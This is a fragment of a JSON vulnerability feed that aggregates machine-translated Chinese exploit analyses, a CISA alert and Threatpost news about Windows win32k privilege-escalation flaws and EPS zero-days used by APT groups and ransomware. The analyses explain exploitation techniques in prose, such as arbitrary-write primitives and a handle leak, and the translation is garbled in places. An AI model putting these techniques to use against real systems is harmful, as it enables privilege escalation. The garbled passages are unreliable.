{"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-03-23T07:22:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "edition": 1, "description": "0x1 Foreword\n\n360 Internet Security Center recently captured a\u201cceber\u201dblackmailer Trojan variants, the variants with other\u201cceber\u201dblackmailer Trojan variants in the code The execution flow and not too big difference. Only it is worth noting that the Trojan exploit CVE-2016-7255 privilege elevation vulnerability on its own. right. This article will analyze the blackmailer for CVE-2016-7255 privilege elevation vulnerability in the use of the process.\n\n0x2 vulnerability details\n\nThe problem code is in win32k! xxxNextWindow, due to the lack of the necessary checks directly to the tagWND+0xC0 members offset 0x28 corresponding to the address of the value with 4 or operation, and tagWND+0xC0 is controllable, which leads to arbitrary address write. The vulnerable code is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417778. png)\n\nFigure 1 vulnerable code\n\nFig. v12 shows is tagWND structure, the structure as shown in omitted section.\n\n! [](/Article/UploadPic/2017-3/201732314417810. png)\n\nFigure 2 tagWND structure of the body\n\nFrom the above figure it can be seen, tagWND+0xC0 corresponds spmenu members, if there is a user state function can be the member of the assignment, you can trigger any address write. For 32-bit systems, you can directly call the SetWindowLong function SetWindowLong function will call the kernel mode function NtUserSetWindowLong the completion of this function; for 64-bit systems, does not exist you can use the user state function, but you can use the syscall of the way to call the kernel mode function NtUserSetWindowLong or function NtUserSetWindowLongPtr to complete this work. The following description is NtUserSetWindowLong function, NtUserSetWindowLongPtr the function execution process is the same.\n\nNtUserSetWindowLong function is just a shell, it will pass the parameter to the xxxSetWindowLong and call it, the function is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417836. png)\n\nFigure 3 xxxSetWindowLong function\n\nIn this function, the incoming nIndex judgment, and according to the nIndex value to perform the corresponding operation. For nIndex value of -16, and -20, and -12, and-21 situation, will call xxxSetWindowData function for processing. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417404. png)\n\nFigure 4 call xxxSetWindowData function for processing\n\nThe function receives xxxSetWindowLong of the parameters, when the nIndex parameter is-12 out of GWL_ID, and the operation of the window style is WS_CHILD or WS_CHILDWINDOW\uff080x40000000, will be the operation window tagWND structure spmenu members of the value set to dwNewLong it. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417349. png)\n\nFigure 5 The trigger of the position of vulnerability\n\nSince dwNewLong is to call NtUserSetWindowLong function when parameters are passed, the user mode process can use the syscall feel free to control it. And win32k! xxxNextWindow function of spmenu+0x28 members of With 4 or operation, thus triggering the arbitrary address write.\n\n0x3 exploit analysis\n\nFrom the vulnerability detail can be seen, the user mode process have to tagWND structure spmenu members the right to amend, the member is a tagMENU structure body, the structure is defined as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417245. png)\n\nFigure 6 tagMENU structure of the body\n\nNot difficult to see, xxxNextWindow function to modify the value is spmenu the fFlags member of the offset 0x28, and since the members with 0x4 or operation, and therefore the vulnerability can only be modified 1bit size of the area.\n\nYou can only modify 1bit on the surface it looks seemingly of little value, however this Trojan variant is not only to focus on this 1bit, but transferred to the tagWND structure of the cbWNDExtra member that represents the window the additional data size. If you can pass the Modify window the additional data size to cover the key address, and then re-use other way to write data, you can achieve perfect utilization.\n\nThen to complete the cbWNDExtra member of the write operation, it must obtain the cbWNDExtra member of the address or is the cbWNDExtra member relative to a known address offset. Except you must also obtain the additional address of the data or is relative to a known address offset to be calculated and written. For obtaining the cbWNDExtra member of the address, the Trojan creates two window\u201cExtraWnd1\u201dand\u201cExtraWND2\u201d, and the two Windows differs in its window class. cbWndExtra member that corresponds exactly to the tagWND the cbWNDExtra member. The program will be two window class. cbWndExtra members were assigned to 0x118 and 0x130, as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417654. png)\n\nFigure 7 create two Windows\n\nCreate a window after is to get the cbWNDExtra member of the tagWND structure of the offset, using HMValidateHandle function. The function and not in user mode export, but there's a user mode function IsMenu call it. Trojan horse determined by IsMenu related byte code of the location acquisition HMValidateHandle address.\n\n! [](/Article/UploadPic/2017-3/201732314417116. png)\n\nFigure 8 The use of byte-code positioning function\n\nHMValidateHandle function will leak tagWND structure of the content, so the Trojan can easily locate the cbWNDExtra member of the tagWND structure of the offset. For insurance purposes, the Trojan determines the two window tagWND structure of the cbWNDExtra member of the offset, when the two cbWNDExtra to register the window class to set the value of the 0x118 and 0x130 and offset are the same before the description of the offset effective.\n\n! [](/Article/UploadPic/2017-3/201732314417591. png)\n\n**[1] [[2]](<84568_2.htm>) [[3]](<84568_3.htm>) [next](<84568_2.htm>)**\n", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84568.htm", "id": "MYHACK58:62201784568", "type": "myhack58", "title": "\u201ccerber\u201dblackmailer for CVE-2016-7255 exploit analysis-exploit warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-01T14:57:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-7855", "CVE-2016-7255"], "edition": 1, "description": "The Windows kernel mention the right Vulnerability, CVE-2016-7255 has been a lot of media attention. In the 11 month's Patch Tuesday, Microsoft released for this vulnerability fix, as MS16-135 announcement of the part. According to Microsoft's description, CVE-2016-7255 mainly used to perform targeted attacks, and by some of the\u201cwild way\u201dto find samples. Google and Microsoft have confirmed that a Russian hacker group APT28 used a Flash Vulnerability, CVE-2016-7855 and this kernel mention the right vulnerability to perform a targeted attack, Google also released some for this vulnerability the discussion: \nhttps://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html \nhttps://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/ \nhttp://securityaffairs.co/wordpress/53242/hacking/cve-2016-7255-zero-day.html \nMcAfee Labs vulnerability research team spent a lot of time to analyze this vulnerability. In this article we will briefly discuss some of our findings. \nAnalysis \nWe first from MS16-135 patch to start the analysis, \u5f88\u5feb\u6211\u4eec\u5c31\u6ce8\u610f\u5230MS16-135\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u66f4\u65b0\u4e86win32k.sys so our next step is to start comparing through binary differential means two win32k. sys file to install the patch before and after it. In addition, our test system is running Windows 7, The version number is 6. 1. 7601. 23584\u3002 \nLook at the binary difference of the results, we note that the following function is modified. \n! [](/Article/UploadPic/2016-12/201612312262609. png? www. myhack58. com) \nFigure 1: in win32k. sys is to change the function-xxxNextWindow \nAfter these preliminary investigations we conclude that: CVE-2016-7255 to the patch fully applied to the repair win32k. sys in xxxNextWindow function. \nThe following screenshot shows a patch of xxxNextWindow(x, x)the change of a more advanced overview: \n! [](/Article/UploadPic/2016-12/201612312262532. png? www. myhack58. com) \nFigure 2: The function xxxNextWindow advanced differential results\nWe can see in the repair function to add some new logic, with a red highlight. Zoom in to the first newly inserted basic block, we can see the introduction of a new code to eax + 0x23 compares the value of the operation: \n! [](/Article/UploadPic/2016-12/201612312262346. png? www. myhack58. com) \nFigure 3: xxxNextWindow inserted into the first basic block\nThen, our next newly inserted basic block saw a similar logic. \n! [](/Article/UploadPic/2016-12/201612312262724. png? www. myhack58. com) \nFigure 4: xxxNextWindow inserted in the second basic block\nGoogle has stated that the vulnerability\u201ccan be obtained by win32k. sys system call NtSetWindowLongPtr()for GWL_STYLE set to WS_CHILD window handle on the index GWLP_ID trigger.\u201c \nIn fact, NtSetWindowLongPtr()only played trigger this vulnerability to the role, and the fundamental reason is that xxxNextWindow it. More specifically, by NtSetWindowLongPtr()to set inappropriate parameter can trigger xxxNextWindow in the\u201cany address write\u201dscene. \nNow let's look at the unpatched xxxNextWindow(x, x, ...)of the decompiled version. \n! [](/Article/UploadPic/2016-12/201612312262345. png? www. myhack58. com) \nFigure 5: unrepaired xxxNextWindow the decompiled version\nApply the patch after xxxNextWindow(x, x, ...)as shown below: \n! [](/Article/UploadPic/2016-12/201612312262846. png? www. myhack58. com) \nFigure 6: the repaired xxxNextWindow the decompiled version\nPatched after the code using a conditional branch statement\u201c(*(_BYTE *)(v8 + 0x23) &amp; 0xC0) != 0x40\u201denhanced parameter validation. \nIn this new statement, the variable v8 in eax is a GetNextQueueWindow call return value. \uff08See Figure\uff09 \n! [](/Article/UploadPic/2016-12/201612312262410. png? www. myhack58. com) \nFigure 7: variable v8 from the GetNextQueueWindow the call:\u201cv8 = _GetNextQueueWindow(v7, v31, 1);\u201d \nQuick View _GetNextQueueWindow(x, x, ...)is achieved, it reveals the function actually returns a pointer to the tagWND structure pointer. \nThe following figure shows the windbg in tagWND structure: \n! [](/Article/UploadPic/2016-12/201612312262587. png? www. myhack58. com) \nFigure 8: tagWND structure\nAnalyzing this code, we can get to know tagWND configuration offset 0x78 of the field is with the vulnerabilities associated. The following from a not repair function to decompile the lines of code confirms this: \n! [](/Article/UploadPic/2016-12/201612312262301. png? www. myhack58. com) \nFigure 9: unrepaired xxxNextWindow problems in the code\nNow the question becomes simple: if we can control in the v8+0x78 the value at the address, it is possible in the core region of an arbitrary address for a write operation, and it is likely you can achieve the mentioned rights. Fortunately, a user state of the API NtSetWindowLongPtr it can be used in this position is set to any value. \nThe following figure shows, we passed to the NtSetWindowLongPtr value, 0x41414141, is the reflection to the tagWND structure, through this vulnerability you can easily achieve arbitrary memory write. \n! [](/Article/UploadPic/2016-12/201612312262505. png? www. myhack58. com)\n\n**[1] [[2]](<82548_2.htm>) [next](<82548_2.htm>)**\n", "modified": "2016-12-31T00:00:00", "published": "2016-12-31T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82548.htm", "id": "MYHACK58:62201682548", "type": "myhack58", "title": "CVE-2016-7255: analysis of Mining the Windows kernel to mention the right vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T11:27:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "edition": 1, "description": "In 2015, FireEye released a Microsoft Office EPS\uff08Encapsulated PostScript in the two vulnerability details. Wherein, a is 0day vulnerabilities, one in the attack a few weeks before playing the patch. Recently, FireEye and Microsoft Office products in the discovery of three new 0day vulnerabilities, these vulnerabilities are being the attacker. \nIn 2017 at the end of 3, We detected another malicious file, which uses the EPS of the unknown vulnerabilities and the Windows Graphics Device Interface GDI in the recently patched vulnerability to deliver malicious software. Subsequently, Microsoft in the 2017 year 4 months to deactivate the EPS, but FireEye in EPS, and found a second unknown vulnerability. \nFireEye believes that there are two organizations Turla and another unknown financial criminal organizations is the use of the first EPS 0day Vulnerability CVE-2017-0261, and APT28, is to use the second EPS 0day Vulnerability CVE-2017-0262 and a new privilege escalation\uff08EOP\uff09 0day Vulnerability CVE-2017-0263 in. Turla and APT28 is Russian cyber espionage organizations, they will these 0day vulnerabilities applied to European Foreign and military Department. And this unidentified financial crime organizations are specifically targeted in the Middle East with offices of regional banks and global banks. In the following, we proceed with the introduction of EPS 0day vulnerabilities, related malware and new EOP 0day vulnerabilities. Each EPS 0day vulnerabilities are provided in the corresponding EOP exploit code, in order to provide the right, the code must bypass the sandbox, in order to perform the processing for the EPS FLTLDR. EXE instance. \nWe found that the malicious file is used for the delivery of three different payload. CVE-2017-0261 for delivery SHIRIME\uff08Turla and NETWIRE\uff08unknown financial crime organization, CVE-2017-0262 for delivery GAMEFISH\uff08APT28 it. CVE-2017-0263 for delivery GAMEFISH payload during the elevated privileges. \nFireEye the company's e-mail and network product detects these malicious files. \nIn these Vulnerability Information Disclosure, FireEye has been with the Microsoft Security Response Center MSRC for coordination. Microsoft recommends that all customers follow the security advice ADV170005 in the guidance, do a good job related security and Defense work. \nCVE-2017-0261--EPS\u201crestore\u201dUAF vulnerability \nOpen the Office document, FLTLDR. EXE will be used for rendering included the vulnerability of the embedded EPS image. Here the EPS file is a PostScript program, you can\u201crestore\u201doperation using the UAF vulnerability. \nAccording to the PostScript of the official Description:\u201ca local VM object allocation and the local VM in the existing objects of the modified called by the save and restore function is completed, in the name of the corresponding operation identifier, you can refer to them. save and restore can be used to package in the local VM in the PostScript language program related to the code. restore to be able to release the newly created object, and undo from the corresponding save operation after the existing object to modify.\u201d \nAs described above, the restore operation will be recovered from the save operation after the allocated memory. For the UAF vulnerability to say, when the forall operation of the combination, then it could not be better. Figure 1 shows the use of the save and restore operation of the pseudo-code. \n! [](/Article/UploadPic/2017-5/2017517184135487. png? www. myhack58. com) \nFigure 1: exploit the pseudo-code \nThe following operation allows the pseudo-code leaks the metadata, in order to achieve the Read/Write primitives: \n1\\. Create forall_proc array, only a single restore proc elements \n2\\. The EPS state is saved to eps_state \n3\\. In the Save created after the uaf_array \n4\\. Use forall operation to traverse uaf_array elements, for each element call forall_proc \n5\\. The uaf_array the first element is passed to the restore_proc of the call, the process contained in the forall_proc. \n6\\. restore_proc \nTo restore the initial state, the release uaf_array \nalloc_string process will be recycled to release the uaf_array \nforall_proc to call leak_proc \n7\\. forall operation of the follow-up calls for the recovery of uaf_array each element of the call leak_proc, these elements are now stored alloc_string the results of the process \nFigure 2 demonstrates in recovery after using uaf_array the debug log. \n! [](/Article/UploadPic/2017-5/2017517184136535. png? www. myhack58. com) \nFigure 2: uaf_array recycle the debug log \nThrough the operation of save operation after the identifier of the operation, the attacker can manipulate the memory layout, and the UAF vulnerability is converted to a read/write primitive. Figure 3 shows a forgery of the string, the length is set to 0x7fffffff, the cardinality is 0. \n! [](/Article/UploadPic/2017-5/2017517184136165. png? www. myhack58. com) \nFigure 3: Forge of the string object \nThe use of read and write arbitrary user memory capacity, The EPS program may further search the gadgets to build ROP chains, and create a file object. Figure 4 shows the in-memory fake file objects. \n! [](/Article/UploadPic/2017-5/2017517184136436. png? www. myhack58. com) \nFigure 4: with the ROP of the pseudo-file object \nBy Faking the file object call to closefile, the exploit code can be transferred to the ROP and start the shellcode with. Figure 5 shows closefile processing program part of the disassembly procedure. \n! [](/Article/UploadPic/2017-5/2017517184136717. png? www. myhack58. com) \nFigure 5: closefile Stack Pivot the disassembly code \nOnce executed, the malware will use the ROP chain to modify the stored shellcode memory region of the protection mechanisms. Thus, the shellcode will be able to perform FLTLDR. EXE running in a sandbox, and at the same time, in order to escape the sandbox detection, it also needs to further mention the right. \nAccording to FireEye found that the use of the vulnerability of the EPS program has two different versions. Wherein st07383. en17. docx using 32 or 64 bit version of CVE-2017-0001 to provide the right, and then perform a contains called SHIRIME malware inject the JavaScript payload. SHIRIME is Turla commonly used specially crafted JavaScript injector one, as the first stage of the payload into the target system, and implements the management and control functions. From the beginning of 2016 since we observed in the wild using the SHIRIME had many times revision, in this 0day vulnerability used in the attack was the latest version, v1. 0. 1004\uff09 \nThe second document Confirmation_letter. docx using 32 or 64 bit version of CVE-2016-7255 to mention the right, and then injected into the NETWIRE malware a new variant. According to our observation, the file is a different version of the file name is very similar. \nThese documents in the EPS program contains different logic to complete the ROP chain and shellcode construct. At the same time, it also uses a simple algorithm for the shellcode part of the obfuscation process, specifically as shown in Figure 6. \n\n\n**[1] [[2]](<86206_2.htm>) [[3]](<86206_3.htm>) [next](<86206_2.htm>)**\n", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "MYHACK58:62201786206", "href": "http://www.myhack58.com/Article/html/3/62/2017/86206.htm", "title": "For the APT organization to use the EPS vulnerabilities in and mention the right vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-03-08T18:38:38", "bulletinFamily": "info", "cvelist": ["CVE-2021-1732"], "description": "Microsoft has released a security advisory to address an escalation of privileges vulnerability, [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), in Microsoft Win32k. A local attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1732 and apply the necessary patch to Windows 10 and Windows 2019 servers.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>); we'd welcome your feedback.\n", "modified": "2021-02-09T00:00:00", "published": "2021-02-09T00:00:00", "id": "CISA:911DE59572B6EF78B42DD868D622F637", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation", "type": "cisa", "title": "Microsoft Warns of Windows Win32k Privilege Escalation", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-02-16T18:53:24", "bulletinFamily": "info", "cvelist": ["CVE-2021-1732"], "description": "Microsoft has removed a faulty servicing stack update, which was causing issues for Windows users when they tried to install last week\u2019s [Patch Tuesday security updates](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>).\n\nMicrosoft\u2019s [servicing stack update](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) provides fixes for the component that installs Windows updates. This particular defective update ([KB4601392](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)) applied to Windows 10 users (version 1607 for 32-bit and x64-based systems) and Windows Server 2016 users.\n\nTo address this issue, Microsoft has removed the faulty update and released a new one ([KB5001078](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere is a known issue that halts the installation progress of the February 9, 2021 security update,\u201d said Microsoft on Friday.\n\n## **Microsoft Faulty Update: A Windows Security Issue **\n\nMicrosoft said that the erroneous servicing-stack update (KB4601392) froze installations for the \u201cCumulative Update\u201d from the recent Windows Update. This resulted in the installation for the update halting at 24 percent.\n\nWindows users \u2013 who [reported issues](<https://www.askwoody.com/tag/kb5001078/>) \u2013 must install this new servicing stack update before installing the its recent February Patch Tuesday security update from last week.\n\n\u201cYou must install the new servicing-stack update (SSU) [KB5001078 ](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)before installing this cumulative update (LCU),\u201d according to Microsoft. \u201cSSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u201d\n\n## **How Windows Users Can Mitigate if They Already Installed KB4601392**\n\nMicrosoft gave the follow mitigation advice for devices that have already installed KB4601392:\n\n * Users should restart their devices and then follow only steps 1, 2 and 4a from [Reset Windows Update components manually.](<https://docs.microsoft.com/en-us/windows/deployment/update/windows-update-resources#reset-windows-update-components-manually>)\n * They should then restart their devices again.\n * [KB5001078](<https://support.microsoft.com/help/5001078>) should now install from Windows Update when users select \u201ccheck for updates\u201d \u2013 or they can wait for it to install automatically.\n * Users should then be able to install the latest Cumulative Update from Windows Update.\n\nFor Windows users who haven\u2019t applied the previous update, the new update \u201cis available through Windows Update,\u201d said Microsoft. \u201cIt will be downloaded and installed automatically.\u201d\n\nTo get the stand-alone package for the update, users can also go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001078>) website said Microsoft.\n\n## **Patch Tuesday Security Updates: Apply Now **\n\nMicrosoft\u2019s February Patch Tuesday from last week addressed nine critical-severity cybersecurity bugs, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nThe bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>),** **is being actively exploited, according to Microsoft\u2019s advisory. This underscores the need for sysadmins to quickly apply the update. This is why the faulty servicing-stack update creating an obstacle for deploying Patch Tuesday updates is an issue for companies.\n\n\u201cThe exploitation of this vulnerability would allow an attacker to execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted with the compromised machine,\u201d said Chris Hass, director of Information Security and Research at Automox, in an email.\n\n\u201cBecause this vulnerability is already being used by attackers, patching this vulnerability is as soon as possible is absolutely crucial,\u201d said Hass.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "modified": "2021-02-16T16:47:36", "published": "2021-02-16T16:47:36", "id": "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0", "href": "https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/", "type": "threatpost", "title": "Microsoft Pulls Bad Windows Update After Patch Issue", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:27", "bulletinFamily": "info", "cvelist": ["CVE-2016-7199", "CVE-2016-7209", "CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "description": "Microsoft followed through and today patched a zero-day vulnerability being exploited in public attacks that was [disclosed by Google researchers](<https://threatpost.com/google-reveals-windows-kernel-zero-day-under-attack/121689/>) nine days ago.\n\nThe victims have yet to have been identified, but [Microsoft did accuse the Sofacy APT gang](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of carrying out the attacks. Sofacy is generally thought to have ties to Russian military intelligence and its targets are strategic, such as government and diplomatic agencies, military and defense contractors, and public policy think-tanks.\n\nGoogle\u2019s disclosure on Oct. 31 came 10 days after it privately reported the vulnerability to Microsoft, along with a Flash zero day to Adobe also used in these attacks.\n\nAdobe patched the Flash vulnerability with an [emergency update](<https://threatpost.com/adobe-patches-flash-zero-day-under-attack/121567/>) released on Oct. 26, but Microsoft failed to publicly acknowledge the bug until only after Google publicly disclosed it. Google\u2019s internal policy gives vendors seven days to publicly report or patch vulnerabilities being actively exploited.\n\nGoogle said the vulnerability is a local privilege escalation in the Windows kernel that leads to a sandbox escape.\n\n\u201cIt can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD,\u201d Google\u2019s Neel Mehta and Billy Leonard said in their [disclosure](<https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html>).\n\nThe attackers chained this bug and the Flash zero day in order to get on targeted computers. The sandbox escape allows the attacker to run code in kernel mode.\n\n\u201cMicrosoft implemented new exploit mitigations in the Windows 10 Anniversary Update version of the win32k kernel component,\u201d Microsoft said in its bulletin, [MS16-135](<https://technet.microsoft.com/library/security/MS16-135>). \u201cThese Windows 10 Anniversary Update mitigations, which were developed based on proactive internal research, stop all observed in-the-wild instances of this exploit.\u201d\n\nMS16-135 also patched two other elevation of privilege vulnerabilities in the Windows kernel (CVE-2016-7215 and CVE-2016-7246), as well as an information disclosure bug in the kernel that opens the door for a kernel ASLR bypass (CVE-2016-7214), and a separate information disclosure bug in the Windows browser.sys kernel-mode driver (CVE-2016-7218).\n\nSix of the 14 bulletins put out by Microsoft today are rated critical. One, [MS16-132](<https://technet.microsoft.com/library/security/MS16-132>), included another vulnerability under attack in the Windows Graphics Component. Microsoft said a remote code execution Open Type Font vulnerability was patched in the Windows font library.\n\nThat bulletin patched three other flaws, including an information disclosure flaw in Open Type Font, specifically in the ATMFD component, which leaks enough information to carry out a further compromise. Also addressed was a remote code execution memory corruption vulnerabilities in Windows Animation Manager and Windows Media Foundation.\n\nMicrosoft also provided cumulative updates for its browsers, Edge and Internet Explorer. The Edge update, [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>), patched 17 vulnerabilities, most of which lead to remote code execution. Two of the flaws, CVE-2016-7209 and CVE-2016-7199, were publicly disclosed, Microsoft said, but not used in in-the-wild attacks. The second disclosed bug was also patched in the Internet Explorer update, [MS16-142](<https://technet.microsoft.com/library/security/MS16-142>), which patched seven CVEs.\n\n[MS16-130](<https://technet.microsoft.com/library/security/MS16-130>) patched three critical Windows bugs, a remote code execution flaw in the way Windows\u2019 image file loading handles malformed image files, along with two elevation of privilege flaws in Windows IME and Windows Task Scheduler.\n\nAnother remote code execution vulnerability was addressed in [MS16-131](<https://technet.microsoft.com/library/security/MS16-131>) in the Microsoft Video Control component. The remaining critical bulletin is the Adobe Flash Player update for IE and Edge; Adobe released an update today for Flash Player patching [nine remote code execution flaws](<https://threatpost.com/adobe-patches-nine-code-execution-flaws-in-flash-player/121839/>) in the software.\n\nThough rated important by Microsoft, an Office bulletin, [MS16-133](<https://technet.microsoft.com/library/security/MS16-133>), also merits attention because it patches a dozen vulnerabilities including 10 that lead to remote code execution. None of the Office bugs are being publicly attacked, Microsoft said.\n\nMicrosoft also patched SQL Server, addressing a half-dozen elevation of privilege and information disclosure vulnerabilities in [MS16-136](<https://technet.microsoft.com/library/security/MS16-136>). Three of the EoP bugs are in the SQL Server RDBMS engine, along with a cross-site scripting flaw in SQL Server MDS, an information disclosure issue in SQL Analysis Services, and another EoP issue in the SQL Server Engine Server Agent.\n\n\u201cThe top priority for most administrators will be to quickly deploy fixes for browsers, graphics components, and Office. All of these components are affected by one or more code execution vulnerabilities Microsoft has classified as highly exploitable,\u201d said Craig Young, security researcher at Tripwire. \u201cThese are of the highest priority due to the fact that the vulnerabilities can potentially be triggered through normal web browsing activities giving an external attacker a way into networks.\u201d\n\nThe remaining bulletins are also rated important:\n\n * [MS16-134](<https://technet.microsoft.com/library/security/MS16-134>) patches 10 elevation of privilege flaws in the Windows Common Log File System (CLFS)\n * [MS16-137](<https://technet.microsoft.com/library/security/MS16-137>) patches three vulnerabilities in Windows NTLM, Virtual Secure Mode and Local Security Authority Subsystem Service\n * [MS16-138](<https://technet.microsoft.com/library/security/MS16-138>) patches four elevation of privilege vulnerabilities in the Windows Virtual Hard Disk Driver\n * [MS16-139](<https://technet.microsoft.com/library/security/MS16-139>) patches a local Windows kernel elevation of privilege flaw in how the Windows Kernel API enforces permissions\n * [MS16-140](<https://technet.microsoft.com/library/security/MS16-140>) patches a security feature bypass in the Windows Secure Boot component; an attacker could disable code integrity checks and allow test-signed executables and drivers to be loaded.\n", "modified": "2016-11-08T20:23:12", "published": "2016-11-08T14:57:26", "id": "THREATPOST:F10810414F1898BE0159A069C1B719B2", "href": "https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/", "type": "threatpost", "title": "Microsoft Patches Zero Day Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-09T22:45:30", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1472", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-24112", "CVE-2021-26701"], "description": "Microsoft has addressed nine critical-severity cybersecurity bugs in February\u2019s Patch Tuesday updates, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nSix of the security holes \u2013 including one of the critical bugs \u2013 were already publicly disclosed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOverall, the computing giant has released patches for 56 CVEs covering Microsoft Windows components, the .NET Framework, Azure IoT, Azure Kubernetes Service, Microsoft Edge for Android, Exchange Server, Office and Office Services and Web Apps, Skype for Business and Lync, and Windows Defender.\n\n## **Actively Exploited Security Bug in Windows Kernel**\n\nThe security bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>)** **is being actively exploited, according to Microsoft\u2019s advisory. It carries a vulnerability-severity rating of 7.8 on the CVSS scale, making it important in severity \u2013 however, researchers said it deserves attention above some of the critical bugs in terms of patching priority.\n\nIt exists in the Windows Win32k operating system kernel and is an elevation-of-privilege (EoP) vulnerability. It would allow a logged-on user to execute code of their choosing with higher privileges, by running a specially crafted application. If successful, attackers could execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted on the compromised machine.\n\n\u201cThe vulnerability affects Windows 10 and corresponding server editions of the Windows OS,\u201d said Chris Goettl, senior director of product management and security at Ivanti. \u201cThis is a prime example of why risk-based prioritization is so important. If you base your prioritization off of vendor severity and focus on \u2018critical\u2019 you could have missed this vulnerability in your prioritization. This vulnerability should put Windows 10 and Server 2016 and later editions into your priority bucket for remediation this month.\u201d\n\n## **Critical Microsoft Bugs for February Patch Tuesday**\n\nNone of the critical bugs rate more than an 8.8 (out of 10) on the CVSS scale, but all allow for remote code execution (RCE) and many should take top priority, according to security 